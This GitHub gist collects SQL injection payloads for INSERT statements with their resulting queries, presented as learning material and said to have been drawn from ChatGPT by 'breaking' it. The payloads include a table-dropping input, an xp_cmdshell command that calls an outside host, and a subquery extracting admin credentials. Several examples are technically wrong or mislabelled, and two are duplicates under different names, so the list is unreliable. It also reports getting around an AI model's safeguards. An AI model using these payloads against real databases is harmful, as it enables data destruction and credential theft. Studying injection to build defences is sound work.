Skip to content

Instantly share code, notes, and snippets.

@shriyanss

shriyanss/sql-insert.md

Last active January 7, 2025 19:09
Show Gist options
  • Save shriyanss/1139f8c2b01e074642b7df745f9abc55 to your computer and use it in GitHub Desktop.
Save shriyanss/1139f8c2b01e074642b7df745f9abc55 to your computer and use it in GitHub Desktop.
Download ZIP
SQL Injection - Payloads and resultant queries - INSERT
Raw
sql-insert.md

Must read

This is for SQL INSERT statement. For SELECT statements, please see https://gist.github.com/shriyanss/6192ee7eb80da5efc26916922fc9b035

I simply broke ChatGPT to generate the following examples while I was trying to learn SQL Injections. The following output is completely generated by ChatGPT:-

Certainly, here are examples of malicious inputs that could lead to SQL injection vulnerabilities in INSERT statements, along with the resulting queries. As always, it's crucial to use parameterized queries or prepared statements to prevent SQL injection.

Example 1: Classic SQL Injection in INSERT

Malicious Input:

'); DROP TABLE Users; --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES (''); DROP TABLE Users; --', 'password');

Example 2: Union-based SQL Injection in INSERT

Malicious Input:

', 'Malicious Data') UNION SELECT null, null; --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', 'Malicious Data') UNION SELECT null, null; --', 'password');

Example 3: Error-based SQL Injection in INSERT

Malicious Input:

'); CREATE TABLE TestTable (ID INT); --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES (''); CREATE TABLE TestTable (ID INT); --', 'password');

Example 4: Time-based Blind SQL Injection in INSERT

Malicious Input:

', IF(1=1, SLEEP(5), 0); --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', IF(1=1, SLEEP(5), 0); --', 'password');

Example 5: Boolean-based Blind SQL Injection in INSERT

Malicious Input:

', '1'='1' AND 'a'='a'; --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', '1'='1' AND 'a'='a'; --', 'password');

Example 6: Out-of-Band SQL Injection in INSERT

Malicious Input:

'); EXEC xp_cmdshell('nslookup example.com'); --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES (''); EXEC xp_cmdshell('nslookup example.com'); --', 'password');

Example 7: UNION-Based SQL Injection in INSERT (Extracting Data)

Malicious Input:

', (SELECT username FROM admin_users), (SELECT password FROM admin_users)); --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', (SELECT username FROM admin_users), (SELECT password FROM admin_users)); --', 'password');

Example 8: Tautology-Based SQL Injection in INSERT

Malicious Input:

', 1=1; --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', 1=1; --', 'password');

Example 9: Numeric-Based SQL Injection in INSERT

Malicious Input:

', 1=1; --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES ('', 1=1; --', 'password');

Example 10: Time Delay SQL Injection in INSERT

Malicious Input:

'); IF(1=1, SLEEP(5), 0); --

Resultant Query:

INSERT INTO Users (Username, Password) VALUES (''); IF(1=1, SLEEP(5), 0); --', 'password');

Prevent SQL injection in INSERT statements by using parameterized queries or prepared statements and ensuring proper validation and sanitization of user inputs.

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment